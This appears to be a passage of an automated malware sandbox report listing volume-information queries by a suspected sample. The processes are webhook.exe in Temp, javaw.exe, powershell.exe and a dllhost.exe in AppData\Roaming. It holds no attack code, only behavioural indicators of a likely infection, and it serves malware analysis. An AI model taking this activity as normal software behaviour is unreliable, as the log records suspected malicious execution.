Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7728 VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
